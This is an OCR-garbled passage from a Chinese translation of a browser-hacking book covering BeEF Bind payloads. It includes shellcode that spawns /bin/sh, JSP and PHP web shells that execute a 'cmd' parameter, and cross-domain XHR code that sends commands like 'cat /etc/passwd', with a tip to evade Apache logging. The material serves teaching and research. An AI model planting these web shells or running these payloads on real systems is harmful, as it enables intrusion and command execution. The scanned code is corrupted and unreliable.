"\xcd\x80\x3d\x00\x00\x00\x00\x0£\x84\xe4\x01\x00\x00"+ 
"\x8b\x5c\x24\x08\x6a\x06\x58\xcd\x80\x8b\x5c\x24\x04"+ 
"\x6a\x06\x58\xcd\x80\x8b\x1c\x24\x6a\x04\x59\x68\x00"+ 
"\x08\x00\x00\x5a\x6a\x37\x58\xcd\x80\x6a\x00\x68\xff"+ 
"\xff\xff\xff£\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x68"+ 
"\x00\x00\x00\x00\x89\xe3\x6a\x5a\x58\xcd\x80\x89\xc7"+ 
"\x81\xc4\x18\x00\x00\x00\x31\xd2\x31\xc0\x6a\x01\x5b"+ 
"\x50\x40\x50\x40\x50\x89\xel\x6a\x66\x58\xcd\x80\x89"+ 
"\xc6\x81\xc4\x0c\x00\x00\x00\x6a\x0e\x5b\x6a\x04\x54"+ 
"\x6a\x02\x6a\x01\x56\x89\xel\x6a\x66\x58\xcd\x80\x81"+ 
"\xc4\x14\x00\x00\x00\x6a\x02\x5b\x52\x68\x02\x00\x11"+ 
"\x5c\x89\xel\x6a\x10\x51\x56\x89\xel\x6a\x66\x58\xcd"+ 
"\x80\x81\xc4\x14\x00\x00\x00\x43\x43\x53\x56\x89\xel"+ 
"\x6a\x66\x58\xcd\x80\x81\xc4\x08\x00\x00\x00\x43\x52"4+ 
"\x52\x56\x89\xel\x6a\x66\x58\xcd\x80\x81\xc4\x0c\x00"+ 
"\x00\x00\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\xb9\x00"+ 
"\x10\x00\x00\x49\x89\xfb\x01\xcb\xc6\x03\x00\xe3\x05"+ 
"\xe9\xf1\xff\xff\xff\x66\xba\x00\x04\x89\xf9\x89\xf3"+ 
"\x6a\x03\x58\xcd\x80\x57\x56\x89\xfb\xb9\x00\x04\x00"+ 
"\x00\x81\x3b\x63\x6d\x64\x3d\x74\x09\x43\x49\xe3\x3a"+ 
"\xe9\xef\xff£\xff£\xf£\x89\xd9\x81\xc1\x03\x00\x00\x00"+ 
"\x8b\x5c\x24\x14\x41\x6a\x01\x5a\x6a\x04\x58\xcd\x80"+ 
"\x80\x39\x0a\x75\x£2\x68\x00\x00\x00\x00\x68\x01\x00"+ 
"\x00\x00\x89\xe3\x31\xc9\xb8\xa2\x00\x00\x00\xcd\x80"+ 
"\x81\xc4\x08\x00\x00\x00\xe8\x62\x00\x00\x00\x48\x54"+ 
"\x54\x50\x2£\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b"+ 
"\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70"4+ 
"\x65\x3a\x20\x74\x65\xK78\x74\x2£\x68\x74\x6d\x6c\x0d"+ 
"\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6£\x6e\xX74\x72"4+ 
"\x6£\x6C\K2d\x41\x6c\x6c\x6£\K77\xK2d\x4£\x72\x69\x67"4+ 
"\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e"+ 
"\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34"4+ 
"\x38\x0d\x0a\x0d\x0a\x5e\x81\xc7\x00\x04\x00\x00\xb9"+ 
"\x62\x00\x00\x00\xf£3\xa4\x5f£\x5e\x8b\x1lc\x24\x89\xf1l"+ 
"\x81\xc1\x00\x04\x00\x00\x81\xc1\x62\x00\x00\x00\x68"+ 
"\x86\x0b\x00\x00\x5a\x6a\x03\x58\xcd\x80\x89\xfb\x89"+ 
"\xf1\x81\xc1\x00\x04\x00\x00\xba\xe8\x0b\x00\x00\x6a"+ 
"\x04\x58\xcd\x80\x6a\x06\x58\xcd\x80\x89\x£7\xe9\x63"+ 
"\xfe\xff\xf£\x8b\x5c\x24\x0c\x6a\x06\x58\xcd\x80\x31"+ 
"\xdb\x6a\x06\x58\xcd\x80\x8b\x5c\x24\x08\x6a\x29\x58"+ 
"\xcd\x80\x8b\x1lc\x24\x6a\x06\x58\xcd\x80\x31\xdb\x43 "+ 
"\x6a\x06\x58\xcd\x80\x8b\x5c\x24\x04\x6a\x29\x58\xcd"+ 
"\x80\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80"+ 
"\x31\xc0\x50\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"+ 
"\x6e\x89\xe3\x6a\x0b\x58\xcd\x80"; 
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yar uri s 'ntLbps//A472,.15.37.1555 
xhr - new XMLHttpRequest(); 
xhr.open("POST", uri, true); 


4444/"; 


xhr.setRequestHeader("Content-Type", "text/plain"); 


xhr.setRequestHeader('Accept','* 


Ts 


xhr.setRequestHeader("Accept-Language", "en"); 
xhr.sendAsBinary("cmd-" + BeEF Bind Stage); 


以 上 代码 会 向 4444 端 口上 的 BeEF Bind Stager 监 听 器 发 送 一 个 跨 域 POST 请 求 。Linux Stages: 
cmq 参 数 的 值 ， 它 会 被 加 载 到 内 存 ， 然 后 被 初始 的 Stager 执 行 并 处 理 。 发 送 完 Stage 之 后 ， 就 可 以 
通过 匀 连 浏览 器 执行 操作 系统 命令 了 。 如 图 10-32 所 示 ， 由 于 BeEF Bind 设 置 了 CORS 首 部 ， 我 们 


可 以 跨 域 取得 执行 命令 后 的 结果 。 


(© & drowserhacker.com 


Index of / 





rc * Console~ HTML CSS Script DOM Net 


Cookies 


è Clear Persist Profile All Errors Warnings info Debug Info Cookies 





Vor uri = "http://172.16.37.155:4444/"; var cmd ...Language, "en"); xhr.send("omde" + cmd + "Wn" 


>: 
> POST http: //172.16.37.155:4444/ 200 OK 1s 
undefined 


1:ffff:172.16.37.155:80 


e 
e 
e 
e 
e 
e 
e 
e 
e 
e 
e 
e 
e 
e 
e 
e 
e 


LISTEN 

LISTEN 

LISTEN 

LISTEN 

LISTEN 

LISTEN 

LISTEN - 

LISTEN 3132/perl 
ESTABLISHED 3132/perl 
ESTABLISHED 9278/BeEF bind 
TIME.MAIT -~ 
ESTABLISHED - 

LISTEN 9275/sh 
LISTEN 

LISTEN 9275/sh 


ff:172.16.37.1:52978 ESTABLISHED 9275/sh 
11ffff :172.16.37.155:22 11ffff:172.16.37.1:52041 ESTABLISHED - 





图 10-32 ”向 BeEF Bind 发 送 netstat 命 令 











这 里 把 BeEF Bind Shellcode 当 成 了 








Linux 中 的 预 编 码 二 进 制 文件 。 而 这 个 例子 展示 了 BeEF 





Bind Shellcode 作 为 媒介 ， 建 立 双向 通信 并 利用 内 网 服务 时 的 强大 威力 。 


10.6.3 把 BeEF Bind 作为 Web 


shell 


前 面 TrixBox 的 例子 执行 了 一 个 利用 ， 以 下 载 BeEF Bind 二 进 制 内 容 并 执行 它 。 另 一 种 方法 是 
使 用 Java、ASPNET 或 PHP 等 语言 ， 重 新 实现 BeEF Bind Shellcode 的 逻辑 。 


找到 一 个 存在 漏洞 的 Web 应 用 后 , 上 


如 第 9 章 最 后 提 到 的 那个 应 用 ， 可 能 需要 创建 一 个 后 门 ， 








然后 将 其 作为 存在 于 一 个 特定 URL 下 的 新 Web 资 源 。 比 如 , 前 面 讨 论 的 攻击 JBoss 和 GlassFish 的 例 
子 ， 就 演示 了 如 何 部 署 新 的 JSP 或 WAR 文 件 。 部 署 以 后 ， 就 可 以 通过 它们 在 目标 系统 上 生成 OS 
命令 。 如 果 使 用 PHP 或 ASPNET， 可 以 通过 RCE 或 File Upload 漏 洞 给 Web 应 用 的 路 径 中 添加 一 个 


文件 ， 那 么 效果 也 一 样 。 


在 这 些 情况 下 , 不 必 下 载 和 执行 BeEF Bind 二 进 制 内 容 , 可 以 把 BeEF Bind Shellcode 的 逻辑 移 
植 到 任何 服务 器 端的 Web 开 发 语言 中 。 换 句 话 说， 你 可 以 创建 一 个 BeEF Bind Web shell. 
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下 面 列 出 了 BeEF Bind 的 三 个 主要 特性 ， 如 果 想 让 勾 连 浏览 器 与 Web shell 实 现 通信 ， 就 必须 


实现 它们 : 
OQ 每 个 HTTP 响 应 必须 包含 A11ow-Access-From-Origin: *, 以 允许 与 勾 连 浏览 器 的 跨 域 
双向 通信 ; 


口 页 面 必须 接受 POST 请 求 ( Content-type 为 Lext/plain 或 application/x-www-form- 
rulencoded )， 其 中 有 一 个 cm 参数 ， 这 个 参数 中 保存 着 要 执行 的 命令 ; 

a 执行 命令 后 的 输出 结果 必须 返回 给 HTTP 响 应 。 

下 面 的 JSP 代 码 完全 满足 上 述 三 个 条 件 ， 而 且 可 以 在 第 9 章 中 的 利用 情景 下 使 用 : 


<%@ page import-"java.util.*,java.io.*"$» 








<% 
// 需要 跨 源 通信 


response. setHeader ("Access-Control-Allow-Origin", "*"); 


try{ 
// 需要 处 理 Lext /plain 数 据 
BufferedReader br = request.getReader(); 
String line = br.readLine(); 
if(line != null)( 
String[] cmds = line.split("cmd-"); 
if(cmds.length > 0) { 
String cmd - cmds[1]; 
// 执行 命令 
Process p = Runtime.getRuntime().exec(cmd); 
// 读 取 命 令 输出 
OutputStream os = p.getOutputStream(); 
InputStream in = p.getInputStream(); 
DataInputStream dis = new DataInputStream(in); 
String disr - dis.readLine(); 
while(disr != null)( 
out.printin(disr); 
disr - dis.readLine(); 
j 
j 
))catch(Exception e) { 
out .printin("Exception!!"); 
j 


假设 前 面 的 JSP 文 件 已 经 被 成 功 部 署 到 了 一 个 有 漏洞 的 JBoss 6.0.0.M1 服 务 器 ， 使 用 的 利用 方 
法 与 第 9 章 中 讨论 的 相同 。 部 署 之 后 ， 这 个 JSP 文 件 保 存在 BeEF_Bindjsp 中 。 因 为 每 个 HTTP 响 应 
都 会 返回 Access-Control-Allow-Origin header: *x， 所 以 可 以 跨 域 与 这 个 新 JSP 页 面 交 互 。 
此 外 ， 这 个 JSP 页 面 能 够 正确 解析 内 容 类 型 为 text/plain 的 POST 请 求 ， 解 析 后 会 从 cmq 参 数 中 
提取 出 要 执行 的 命令 。 

以 下 JavaScript 代 码 与 本 章 前 面 演 示 的 类 似 ， 它 实现 从 色 连 浏览 器 到 新 JSP BeEF Bind Web 
shell 间 的 跨 域 通信 : 


var uri = "http://browservictim.com"; 
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var port = 8080; 

var path = "BeEF_Bind.jsp"; 

var cmd = "cat /etc/passwd" 

xhr = new XMLHttpRequest (); 
xhr.onreadystatechange = function() { 


if (xhr.readyState == 4) { 
console.log(xhr.responseText); 
j 

j 

xhr.open("POST", uri + ":" + port + "/" + path, true); 


xhr.setRequestHeader("Content-Type", "text/plain"); 
xhr.setRequestHeader('Accept','*/*'); 
xhr.setRequestHeader("Accept-Language", "en"); 
xhr.send("cmd-" + cmd); 


如 图 10-33 所 示 ，POST 请 求 是 跨 域 发 送 的 ， 而 命令 执行 后 的 结果 又 通过 HTTP 响 应 发 回 给 匀 
连 浏览 器 。 根 据 /etc/passwd 中 的 注释 可 知 ，JBoss 运 行 的 操作 系统 是 OS X. 








Ci http://browserh...f_bind_xhr.html 





- | @ browserhacker.com/beef bind xhr.html 








GET beef bind xhi 200 OK browserhacker.com 340B  172.16.37.147:80 
=| http://browservictim.com:8080/BeEF Bind.jsp im.com:8080 4.8 KB 172.16.37.1:8080 
Headers Post Response HTML Cookies 


User Database 


Note that this file is consulted directly only when the system is running 
in single-user mode. At other times this information is provided by 
Open Directory. 


See the opendirectoryd(8) man page for additional information about 
Open Directory. 


q**"*"""""w"a 


nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false 
System Administrator:/var/root:/bin/sh 
daemon:*:1:1:System Services: /var/root:/usr/bin/false 


图 10-33 ”命令 的 输出 被 打印 到 了 JS 控制 台 


以 上 演示 的 通过 JSP 实 现 的 功能 ， 同 样 可 以 使 用 服务 器 端的 其 他 语言 来 实现 。 只 要 能 够 控 
HTTP 响 应 中 的 CORS 首 部 ， 并 能 够 执行 OS 命令 ， 这 个 技术 就 行 得 通 。 
用 PHP 实 现 相 同 的 逻辑 只 需 两 行 代码 : 


<?php header ("Access-Control-Allow-Origin: *"); 
echo Gsystem($ POST['cmd']); ?> 


前 面 讨 论 的 JavaScript 代 码 可 以 用 来 与 这 段 PHP 代 码 交 互 ， 只 要 稍微 改 一 下 Content-type 就 行 : 


xhr.setRequestHeader("Content-Type", 
"application/x-www-form-urlencoded"); 





= 





gl 
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一 般 来 说 ， 能 使 用 POST 请 求 就 不 要 使 用 GET 请 求 ， 因 为 Apache 服 务 器 默认 不 会 在 日 志 中 记 
录 POST 请 求 的 请 求 体 : 


172.16.37.1 - - [10/Aug/2013:12:31:56 +0100] 
"POST /BeEF_Bind.php HTTP/1.1" 200 54884 
"http://browserhacker.com/" "Mozilla/5.0 
(Macintosh; Intel Mac OS X 10.8; rv:22.0) 
Gecko/20100101 Firefox/22.0" 





172.16.37.1 - - [10/Aug/2013:12:32:10 +0100] 
"POST /BeEF_Bind.php HTTP/1.1" 200 5766 
"http: //browserhacker.com/" "Mozilla/5.0 
(Macintosh; Intel Mac OS X 10.8; rv:22.0) 
Gecko/20100101 Firefox/22.0" 


BeEF Bind 的 目标 是 提供 轻 量 、 与 平台 无 关 的 payload。 利 用 它 可 以 基于 应 用 程序 的 缺陷 打开 
后 端 渠 道 ， 以 便 进一步 通信 和 利用 。 它 的 两 阶段 的 架构 意味 着 初始 Stager 可 以 在 非常 严密 的 防御 
措施 下 被 插入 ， 从 而 让 更 大 的 Stage 得 以 成 功 。 

通过 打开 CORS Web 接 口 ， 可 以 向 被 控 系 统 提交 任何 QOS 命令。 另外 ，BeEF Bind 的 逻辑 相对 
简单 ， 可 以 在 任何 语言 中 重新 实现 。 


























10.7 ”小结 


本 章 讨论 的 技术 主要 针对 网 络 设备 和 非 HTTP 协 议 。 除 了 利用 网 络 设备 中 的 Web 接 口 ， 攻 击 
的 重点 都 放 在 协议 之 间 。 

浏览 器 直接 与 IRC 服 务 器 通信 并 不 是 常规 的 使 用 情境 ， 但 正 像 我 们 看 到 的 ， 这 种 用 法 是 可 能 
的 。 这 种 通信 随 着 浏览 器 的 发 展 成 熟 就 不 太 可 能 了 。 这 种 攻击 让 浏览 器 与 非 HTTP 服 务实 现 通 信 ， 
而 且 在 某 些 情况 下 ， 通 过 几乎 标准 的 利用 方法 就 可 以 实现 这 种 攻击 。 
使 用 协议 间 通 信 OPC) 和 协议 间 利 用 CIPE) 技术 ， 可 以 对 网 络 的 软肋 实施 攻击 。 有 时 候 ， 
还 可 以 不 必 考 虑 如 何 绕 过 防火 墙 等 日 益 严 密 的 边界 安全 机 制 。 这 种 攻击 无 情 地 驳斥 了 “内 网 设备 
必然 安全 ”的 论调 。 

在 这 一 章 ， 我 们 还 探讨 了 BeEF Bind payload。 利 用 它 可 以 与 通过 IPE 控 制 的 目标 实现 间接 通 
信 。BeEF Bind 可 以 让 攻击 者 在 不 引起 防火 墙 警 觉 的 情况 下 ， 在 目标 与 浏览 器 间 建 立 连接 。 这 其 
实 是 一 种 与 BeEF 服 务 器 通信 的 更 隐秘 的 方式 。 

这 些 攻击 大 多 致力 于 增强 你 对 网 络 的 访问 权限 , 要 么 是 通过 实施 未 认证 的 修改 , 要 么 是 通过 
利用 额外 的 服务 。 这 些 技术 很 多 还 都 处 于 刚刚 萌芽 的 阶段 ， 而 在 浏览 器 中 对 非 Web 协 议 实施 跨 域 
攻击 ， 是 安全 研究 人 员 会 持续 关注 的 一 个 重要 领域 。 











































































































10.8 ”问题 
(1) 描述 一 下 如 何 取 得 攻击 目标 的 内 网 JP 地址 以 及 为 什么 这 一 步 很 重要 。 
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(2) 如 果 检 测 不 到 目标 的 内 网 下地 址 ， 那 么 该 如 何 识别 它 所 在 的 子 网 呢 ? 

(3) 为 什么 端口 封禁 是 一 个 重要 的 安全 机 制 ? 

(4) 如 何 验 证 所 有 浏览 器 都 会 封禁 的 TCP 端 口 22、25 和 143 实 际 上 是 开放 的 ? 
(5) 解释 一 下 什么 是 NAT Pinning 攻 击 。 

(6) 实现 了 协议 间 通 信和 后， 是 否 绕 过 了 SOP? 

(7) 举例 描述 一 下 什么 是 协议 间 利 用 。 
(8) 协议 间 利 用 有 什么 限制 条 件 ? 

(9) 为 什么 BeEF Bind 要 分 成 两 个 阶段 以 及 这 两 个 阶段 分 别 是 什么 ? 

(10) 为 什么 CORS 对 BeEF Bind 而 言 非常 重要 ? 

要 查看 问题 答案 ， 请 访问 本 书 网 站 https://browserhacker.com/answers ， 或 者 Wiley 的 网 站 





















































http:/www.wiley.comy/go/browserhackershandbook。 
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事实 很 明显 ,既然 你 挑 了 一 本 讲 浏览 器 黑客 攻防 的 书 来 看 , 那 就 说 明 你 跟 我 们 一 样 ， 都 认识 
到 了 浏览 器 使 用 得 有 多 广泛 。 MWE, 手机、 汽车、 轮船 、 飞 机 甚至 国际 空间 站 上 都 有 浏览 器 ! x 
错 ， 平常 得 不 能 再 平常 的 浏览 器 ( 连同 HTML、JavaScript 和 DOM ) 已 经 浪迹 到 了 我 们 这 个 星球 
之 外 ， 随 行 的 还 有 它 的 安全 隐患 。 

浏览 器 安全 的 挑战 不 会 在 短 时 间 内 消失 ,此 消 彼 涨 的 攻防 大 战 仍 会 持续 。 新 的 浏览 器 特性 会 
不 断 涌现 , 不 断 超 越 以 往 “ 史 上 最 棒 ” 的 特性 。 新 的 攻击 手段 来 了 又 走 。 双 方 都 会 犯 思春 的 错误 ， 
别 忘 了 ， 我 们 都 是 人 啊 ! 

早 就 有 人 讲 过 , 计算 机 安全 的 头号 问题 就 是 默认 许可 (default permit ) :， 也 就 是 除非 明确 禁 
IE, 否则 任何 请 求 都 是 被 许可 的 。 一 直 以 来 , 浏览 器 始终 在 坚持 这 个 原则 。 本 书 从 头 到 尾 介绍 了 
很 多 在 特性 的 初始 版 本 发 布 之 后 才 追 加 的 各 种 安全 补丁 。 这 已 经 导致 了 浏览 器 一 直 在 做 亡羊补牢 
的 事情 。 

浏览 器 的 发 展 最 终 由 两 条 战线 掌控 着 。 

(1) 浏览 器 开发 商 为 争取 市 场 份 额 ， 拼 特性 、 拼 体验 、 拼 效用 、 拼 速度 、 拼 全 能 。 

(2) 浏览 器 开发 者 不 断 创造 出 新 的 防范 措施 ， 黑 客 不 断 攻克 这 些 壁 垒 并 发 现 新 漏洞 。 

这 两 条 战线 之 间 潜 移 默 化 地 存在 各 种 联系 ,不 断 增长 的 新 特性 和 新 功能 导致 浏览 器 的 复杂 性 
不 断 提高 ， 可 被 攻击 的 范围 也 越 来 越 大 ， 于 是 第 二 条 战线 的 战场 也 不 断 扩 大 。 当 然 , 安全 与 功能 
之 间 还 有 一 条 相反 的 上 暗 线 ， 那 就 是 废除 默认 许可 ， 代 之 以 默认 拒绝 (default deny )。 如 果 继 续 坚 
持 默 认 许 可 , 那 随 着 新 功能 的 引入 , 产生 新 的 安全 漏洞 是 无 法 避免 的 。 新 漏洞 出 现 就 要 求 在 发 现 
攻击 方法 时 寻求 事后 补救 ， 于 是 猜 捉 老鼠 的 游戏 永远 不 会 谢幕 。 

即使 是 在 应 用 了 默认 拒绝 规则 的 场景 下 , 也 不 可 能 在 白 名 单 中 列 出 所 有 可 能 的 允许 情形 。 只 
要 存在 对 灵活 性 的 要 求 , 那么 组 件 交 互 行为 的 排列 组 合 就 会 增加 。 而 这 相应 地 就 会 扩大 浏览 器 对 
服务 器 以 及 其 他 外 部 资源 的 信任 度 。 

鉴于 目前 开发 人 员 已 经 十 分 注重 安全 , 可 利用 的 情况 或 许 会 有 所 减少 。 表现 在 投入 相同 的 努 
力 发 现 漏洞 的 速度 会 降低 。 不 管 怎么 样 , 任何 新 的 安全 防范 措施 都 会 因为 新 功能 的 复杂 性 而 受到 
攻击 者 的 挑战 。 另 外 ， 如 果 浏 览 器 还 会 继续 扩展 它 的 装机 范围 , 那么 黑客 尝试 在 扩大 后 的 浏览 
领地 上 施展 才华 的 努力 也 会 随 之 增加 。 

现场 测试 是 无 法 代 蔡 的 ， 因 为 浏览 器 的 使 用 越 来 越 广泛 ,而 且 用 途 也 越 来 越 多 。 于 是 一 个 很 
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480 第 11 章 结语 : 最 后 的 思考 








难 改 变 的 事实 摆 在 面前 : 被 作为 攻击 目标 的 核心 浏览 需 的 功能 、 插 件 或 组 件 的 数量 将 持续 增加 。 
开发 者 可 能 会 想方设法 在 发 布 前 模拟 攻击 〈 渗透 测试 )， 或 者 提高 开发 过 程 的 安全 性 ， 以 此 作为 
对 抗 。 但 相对 于 各 种 排列 组 合 、 各 种 可 能 的 情况 以 及 各 种 可 能 的 人 类 创意 ,这 些 对 抗 措 施 仍 然 做 
不 到 万 无 一 失 。 

有 一 点 是 肯定 的 : 如 果 想 让 这 场 猫 捉 老鼠 的 游戏 不 再 那么 惨烈 , 那 就 必须 从 一 开始 设计 起 即 
把 安全 放 在 第 一 位 。 新 的 浏览 融 特 性 如 果 想 在 斗争 中 幸存 下 来 ， 那 就 必须 从 头 到 尾 重视 安全 。 

在 可 预见 的 未 来 ,， 身 处 任何 发 达 地 区 ,你 周围 浏览 器 的 数量 都 很 可 能 比 周围 的 人 要 多 。 不 断 
重演 的 人 类 历史 表明 : 胜 者 为 王 。 对 浏览 器 来 说 ， 现 在 还 只 是 开始 。 但 愿 本 书 已 经 让 你 对 下 一 步 
该 做 什么 有 了 充分 的 理解 。 让 我 们 携 起 手 来 ， 共 同 创造 一 个 更 加 值得 依赖 的 、 安 全 的 互联 网 。 


















































尾 注 


]. http:/Avww.ranum.com/security/computer_security/editorials/dumb/ 


图 浏览 器 安全 领域 的 先锋 之 作 、 浏 览 器 攻击 框架 BeEF 团 队 实战 经 验 总 结 
LE 涵盖 所 有 主流 浏览 器 以 及 移动 浏览 器 
8 分 三 阶段 、 七 大 类 讲解 浏览 器 攻防 方法 





亚马逊 读者 推荐 


“如 果 你 关注 的 是 渗透 测试 和 网 络 安全 ， ato 从 基础 到 进 阶 ， 三 位 作者 细 述 了 大 量 浏览 
Ee ( 或 构建 ) 了 Web 应 用 程序 。 


“本 书 以 精准 视角 深入 介绍 浏览 器 安全 ， 并 为 实际 攻防 中 所 需 的 不 同步 又 提供 了 一 套 完 整 的 方法 论 。” 


“本 书 对 安全 领域 的 人 来 说 不 容错 过 。 作 者 深入 详细 地 介绍 了 如 何 通 过 勾 连 的 浏览 器 来 利用 易 受 攻击 的 网 
站 、 如 何 娴熟 地 攻击 内 部 网 络 ， 为 安全 人 员 做 好 防御 提供 了 详细 指导 。” 
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